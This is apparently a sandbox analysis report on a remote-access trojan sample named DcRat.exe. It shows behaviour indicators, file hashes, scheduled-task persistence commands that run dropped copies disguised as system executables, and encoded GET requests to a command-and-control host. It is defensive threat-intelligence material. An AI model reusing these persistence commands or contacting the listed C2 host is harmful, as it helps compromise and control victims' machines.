  - wscript.exe (PID: 4052)
- The process creates files with name similar to system file names
  - Comsession.exe (PID: 4044)
- Executed via WMI
  - schtasks.exe (PID: 748)
  - schtasks.exe (PID: 2152)
  - schtasks.exe (PID: 2072)
  - schtasks.exe (PID: 3508)
  - schtasks.exe (PID: 2596)
  - schtasks.exe (PID: 1992)
  - schtasks.exe (PID: 3308)
  - schtasks.exe (PID: 1740)
  - schtasks.exe (PID: 2900)
  - schtasks.exe (PID: 2384)
  - schtasks.exe (PID: 2724)
  - schtasks.exe (PID: 2728)
  - schtasks.exe (PID: 1368)
  - schtasks.exe (PID: 2484)
  - schtasks.exe (PID: 2592)
  - schtasks.exe (PID: 2576)
  - schtasks.exe (PID: 2244)
  - schtasks.exe (PID: 2968)
  - schtasks.exe (PID: 1556)
  - schtasks.exe (PID: 3404)
  - schtasks.exe (PID: 3028)
  - schtasks.exe (PID: 3680)
  - schtasks.exe (PID: 2112)
  - schtasks.exe (PID: 1624)
  - schtasks.exe (PID: 2432)
  - schtasks.exe (PID: 1112)
  - schtasks.exe (PID: 1236)
  - schtasks.exe (PID: 2324)
  - schtasks.exe (PID: 1840)
  - schtasks.exe (PID: 1792)
  - schtasks.exe (PID: 1540)
  - schtasks.exe (PID: 2620)
  - schtasks.exe (PID: 1596)
  - schtasks.exe (PID: 2992)
  - schtasks.exe (PID: 1608)
  - schtasks.exe (PID: 128)
  - schtasks.exe (PID: 2560)
  - schtasks.exe (PID: 3520)
  - schtasks.exe (PID: 764)
  - schtasks.exe (PID: 2480)
  - schtasks.exe (PID: 552)
  - schtasks.exe (PID: 2376)
  - schtasks.exe (PID: 3504)
  - schtasks.exe (PID: 2424)
  - schtasks.exe (PID: 920)
  - schtasks.exe (PID: 948)
  - schtasks.exe (PID: 2772)
  - schtasks.exe (PID: 1124)
  - schtasks.exe (PID: 3132)
  - schtasks.exe (PID: 3140)
  - schtasks.exe (PID: 3352)
  - schtasks.exe (PID: 3900)
  - schtasks.exe (PID: 2748)
  - schtasks.exe (PID: 3336)
- Probably delay the execution using 'w32tm.exe'
  - cmd.exe (PID: 4084)
- Reads settings of System Certificates
  - SearchFilterHost.exe (PID: 2104)
INFO
- Reads the computer name
  - DcRat.exe (PID: 3240)
  - Comsession.exe (PID: 2840)
  - Comsession.exe (PID: 4044)
  - SearchFilterHost.exe (PID: 2104)
- Checks supported languages
  - DcRat.exe (PID: 3240)
  - Comsession.exe (PID: 2840)
  - Comsession.exe (PID: 4044)
  - SearchFilterHost.exe (PID: 2104)
- Reads the machine GUID from the registry
  - Comsession.exe (PID: 2840)
  - Comsession.exe (PID: 4044)
  - SearchFilterHost.exe (PID: 2104)
- Reads Environment values
  - Comsession.exe (PID: 2840)
  - Comsession.exe (PID: 4044)
  - SearchFilterHost.exe (PID: 2104)
- Reads product name
  - Comsession.exe (PID: 2840)
  - Comsession.exe (PID: 4044)
  - SearchFilterHost.exe (PID: 2104)
- Creates files in the program directory
  - Comsession.exe (PID: 4044)
- Create files in a temporary directory
  - Comsession.exe (PID: 4044)
- Reads the software policy settings
  - SearchFilterHost.exe (PID: 2104)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win32 Executable (generic) (52.9)
.exe	\|	Generic Win/DOS Executable (23.5)
.exe	\|	DOS Executable Generic (23.5)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2020:12:01 18:00:55+00:00
ImageFileCharacteristics:	Executable, 32-bit
PEType:	PE32
LinkerVersion:	14
CodeSize:	201216
InitializedDataSize:	255488
UninitializedDataSize:	-
EntryPoint:	0x1ec40
OSVersion:	5.1
ImageVersion:	-
SubsystemVersion:	5.1
Subsystem:	Windows GUI

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

106

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

128

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\smss.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll

532

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\w32tm.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Time Service Diagnostic Tool

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\w32tm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

552

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\ChainproviderrefDhcp\explorer.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll

748

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\csrss.exe'" /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll

764

schtasks.exe /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\SearchIndexer.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll

920

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Program Files\WinRAR\System.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll

948

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-006E-0412-0000-0000000FF1CE}-C\1042\wscript.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll

1112

schtasks.exe /create /tn "SearchFilterHostS" /sc MINUTE /mo 5 /tr "'C:\ChainproviderrefDhcp\SearchFilterHost.exe'" /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll

1124

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-006E-040C-0000-0000000FF1CE}-C\1036\dwm.exe'" /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll

1236

schtasks.exe /create /tn "SearchFilterHost" /sc ONLOGON /tr "'C:\ChainproviderrefDhcp\SearchFilterHost.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll

Add for printing

Total events

13 928

Read events

13 863

Write events

Delete events

Modification events


(PID) Process:	(3240) DcRat.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(3240) DcRat.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(3240) DcRat.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(3240) DcRat.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(4052) wscript.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(4052) wscript.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(4052) wscript.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(4052) wscript.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(2840) Comsession.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(2840) Comsession.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
4044	Comsession.exe	C:\Users\Default\Music\26c12092da979c		text
		MD5:E183DD9A9A7BEFD3C8227DA9EEF3ED2C	SHA256:807EBFFF1906ADE84E3B54E22AD1DA197CE169F23351A825F5B244FDF3DD805A
4044	Comsession.exe	C:\Windows\Setup\dllhost.exe		executable
		MD5:EE5DBB44A38F1707D7A6999D4A244F11	SHA256:1335824F722BDBCDFF1734BEBC64267B613D803796DB827ED1118827DB5D74E3
4044	Comsession.exe	C:\Program Files\Opera\dwm.exe		executable
		MD5:EE5DBB44A38F1707D7A6999D4A244F11	SHA256:1335824F722BDBCDFF1734BEBC64267B613D803796DB827ED1118827DB5D74E3
4044	Comsession.exe	C:\Users\Default\Music\ctfmon.exe		executable
		MD5:EE5DBB44A38F1707D7A6999D4A244F11	SHA256:1335824F722BDBCDFF1734BEBC64267B613D803796DB827ED1118827DB5D74E3
4044	Comsession.exe	C:\Windows\Setup\5940a34987c991		text
		MD5:BA0E9A7C54047DD50DEFE59844FF8868	SHA256:52329126B37876962CCCD367B1598E08A2EF3FD76057DADDA69CAE9A08B1FAB7
4044	Comsession.exe	C:\ProgramData\Microsoft\Windows\Templates\f3b6ecef712a24		text
		MD5:BDF91B311C6000F2994BC412D7B61171	SHA256:635654A949F591515F6D2E02A98D5C9D487EA828526DEB7EED137DB623170288
3240	DcRat.exe	C:\ChainproviderrefDhcp\Comsession.exe		executable
		MD5:EE5DBB44A38F1707D7A6999D4A244F11	SHA256:1335824F722BDBCDFF1734BEBC64267B613D803796DB827ED1118827DB5D74E3
3240	DcRat.exe	C:\ChainproviderrefDhcp\file.vbs		text
		MD5:677CC4360477C72CB0CE00406A949C61	SHA256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
4044	Comsession.exe	C:\Program Files\Microsoft Analysis Services\886983d96e3d3e		text
		MD5:7E59303A70FC7F5E13C41900C8333CBC	SHA256:9987AC26A59104EFCEE720A8D2F2F97A71EB4D6E11C46216DB3578BABE2D9115
4044	Comsession.exe	C:\Program Files\Microsoft Analysis Services\csrss.exe		executable
		MD5:EE5DBB44A38F1707D7A6999D4A244F11	SHA256:1335824F722BDBCDFF1734BEBC64267B613D803796DB827ED1118827DB5D74E3

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2104	SearchFilterHost.exe	GET	200	141.8.192.6:80	http://a0917852.xsph.ru/L1nc0In.php?tr1BQ6QBbvW3kb6wPmxfBAsWI7Hkf=BJMSVx7DCP4VDR3n8zIc3&C83t9e=TyqfxuMqSGJyLkhlq6bdf8RbCt1G&ea6e64008403cafb58723e070e1443f2=7d5dd030b37e79418cec3ae612a83930&37e1d955f258ef422616e4d7f6996550=gZzQTMhZGNycDO4UmN3cjYhR2NwQjN1Y2Y2ITO3kjY4UTMzQTM3MjY&tr1BQ6QBbvW3kb6wPmxfBAsWI7Hkf=BJMSVx7DCP4VDR3n8zIc3&C83t9e=TyqfxuMqSGJyLkhlq6bdf8RbCt1G	unknown	text	2.08 Kb	unknown
2104	SearchFilterHost.exe	GET	—	141.8.192.6:80	http://a0917852.xsph.ru/L1nc0In.php?9qYevmpgZouxy9rNFfyFTLKWeDPgjR=OJxz&6be9654e057e53ad44b92f1b1e180352=kVTYmFTN4EzMwQjZkN2MiNWNzIzYiV2Y4QDMxUjZ1UDZhVGMzQ2M4QjMzUzNxgTMzITN4QzM&37e1d955f258ef422616e4d7f6996550=gMwYmN4QTY0kTZ5ETM1QjYkZjZzMDNmVmNjFDOjRTZ1UWMzEjM5MmY&bbaf085ad9ea9a062f6fa1d50505645c=d1nIyUWMhVWZxYjYmRmM1AjYkNzNlVDO0U2N0czYkljNkVGNiVWOxMDOzIiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W	unknown	—	—	unknown
2104	SearchFilterHost.exe	GET	200	141.8.192.6:80	http://a0917852.xsph.ru/L1nc0In.php?9qYevmpgZouxy9rNFfyFTLKWeDPgjR=OJxz&6be9654e057e53ad44b92f1b1e180352=kVTYmFTN4EzMwQjZkN2MiNWNzIzYiV2Y4QDMxUjZ1UDZhVGMzQ2M4QjMzUzNxgTMzITN4QzM&37e1d955f258ef422616e4d7f6996550=gMwYmN4QTY0kTZ5ETM1QjYkZjZzMDNmVmNjFDOjRTZ1UWMzEjM5MmY&bbaf085ad9ea9a062f6fa1d50505645c=d1nIhRTYmhTZ5E2M3gDOjFmN0EmYmFjZ0IzYkFGNmRTN5gjY0ATM1IjY0IiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W&82950ec304dfd0d8b1a927403a3b2069=QX9JiI6ISM3UjM3kjM3MGZlZmYxkjYhFjMyMDNhdTOwMjNxkDM1ICLiEGNhZGOllTYzcDO4MWY2QTYiZWMmRjMjRWY0YGN1kDOiRDMxUjMiRjI6IyMyMmNkZmYmdTMxQWYwQWO0kzN1EzM1QzNlZjYzY2YhJCLigTMjhDZ4Q2N1ITZ0cDN0EWZwMDMhRjYiJGNyIjN5IWMiZzYiFWOlRjI6ICZhdTYwQWN1QWM3MTN0ITOxUTZ5YjZiJjNwETNmVTYwIyes0nIwglZphjaJZTSD1ENRdlTrJ1RNhXQq1UMnR1Ts50VZtGZqp1dVd0TsZ0VNhmT65keZR0TtpFROVTREp1MBRVTpdXaJdXSp9UaJdkTy0kMOhmSXpFbSdUTrZVbahmR6lFNRpmTtpFRPhmSXlVeJRkW1kkaNlmV65EaoRVTspUbJdDcqlEaShVWFJFSlxmSDxUMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEcNRUSuVzVhdnQYpFMOZUSwUERJNnVHpldxUUSyE0UlNHbXJGaaVUSwkFRl9WQpVWSkVUTzQTaNdWQFlkVCFTUnFERNBTWUxUMrdUSwBTRW9WVtNmdOVUSwlkRLNnVHRWdstWS2k0UaRnRtRlVCFTUpdXaJBXRww0ToNUS5Z1RkdnRHplQCl3Yqx2RhdnRtNGSCNVUIplRJtmSYl1a1cVWw4EbJZTSTpFdG1GVWJUMSl2dplkWKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTE5ENZpGT0c3QPRTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXSD10dJpGTzsmaMRzZqxUMRpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEzN1IzN5IzNjRWZmJWM5IWYxIjMzQTY3kDMzYTM5ATNiwiI4ADNzYTY3AjZjdjZkZmNyY2YwIjNiZGOyQDN2QDM0QDN2UWZ1YTY5IiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W	unknown	text	104 b	unknown
2104	SearchFilterHost.exe	GET	200	141.8.192.6:80	http://a0917852.xsph.ru/L1nc0In.php?9qYevmpgZouxy9rNFfyFTLKWeDPgjR=OJxz&6be9654e057e53ad44b92f1b1e180352=kVTYmFTN4EzMwQjZkN2MiNWNzIzYiV2Y4QDMxUjZ1UDZhVGMzQ2M4QjMzUzNxgTMzITN4QzM&37e1d955f258ef422616e4d7f6996550=gMwYmN4QTY0kTZ5ETM1QjYkZjZzMDNmVmNjFDOjRTZ1UWMzEjM5MmY&82950ec304dfd0d8b1a927403a3b2069=0VfiIiOiEzN1IzN5IzNjRWZmJWM5IWYxIjMzQTY3kDMzYTM5ATNiwiI3gzM5UTM2QDZhhzNjZTN5EmY1MGNhhDMmhTO0IDZ5gTNlZWY4AzY1IiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W	unknown	text	104 b	unknown
2104	SearchFilterHost.exe	GET	200	141.8.192.6:80	http://a0917852.xsph.ru/L1nc0In.php?9qYevmpgZouxy9rNFfyFTLKWeDPgjR=OJxz&6be9654e057e53ad44b92f1b1e180352=kVTYmFTN4EzMwQjZkN2MiNWNzIzYiV2Y4QDMxUjZ1UDZhVGMzQ2M4QjMzUzNxgTMzITN4QzM&37e1d955f258ef422616e4d7f6996550=gMwYmN4QTY0kTZ5ETM1QjYkZjZzMDNmVmNjFDOjRTZ1UWMzEjM5MmY&82950ec304dfd0d8b1a927403a3b2069=0VfiIiOiEzN1IzN5IzNjRWZmJWM5IWYxIjMzQTY3kDMzYTM5ATNiwiIhljNklTO2YmYlF2YmZmZ5MmZxQTYlBzYyIWOyMmYmZTZyIDN4MTNwIiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W	unknown	text	104 b	unknown
2104	SearchFilterHost.exe	GET	200	141.8.192.6:80	http://a0917852.xsph.ru/L1nc0In.php?9qYevmpgZouxy9rNFfyFTLKWeDPgjR=OJxz&6be9654e057e53ad44b92f1b1e180352=kVTYmFTN4EzMwQjZkN2MiNWNzIzYiV2Y4QDMxUjZ1UDZhVGMzQ2M4QjMzUzNxgTMzITN4QzM&37e1d955f258ef422616e4d7f6996550=gMwYmN4QTY0kTZ5ETM1QjYkZjZzMDNmVmNjFDOjRTZ1UWMzEjM5MmY&bbaf085ad9ea9a062f6fa1d50505645c=d1nIwMjN5YjNzQGM0UGOyUmZhRWZiljN5gzY2kTYiJDMllDZkJWMjFWZjJiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W	unknown	text	104 b	unknown
2104	SearchFilterHost.exe	GET	200	141.8.192.6:80	http://a0917852.xsph.ru/L1nc0In.php?9qYevmpgZouxy9rNFfyFTLKWeDPgjR=OJxz&6be9654e057e53ad44b92f1b1e180352=kVTYmFTN4EzMwQjZkN2MiNWNzIzYiV2Y4QDMxUjZ1UDZhVGMzQ2M4QjMzUzNxgTMzITN4QzM&37e1d955f258ef422616e4d7f6996550=gMwYmN4QTY0kTZ5ETM1QjYkZjZzMDNmVmNjFDOjRTZ1UWMzEjM5MmY&9833d94f21f6fee5636ec88fd3ca2a19=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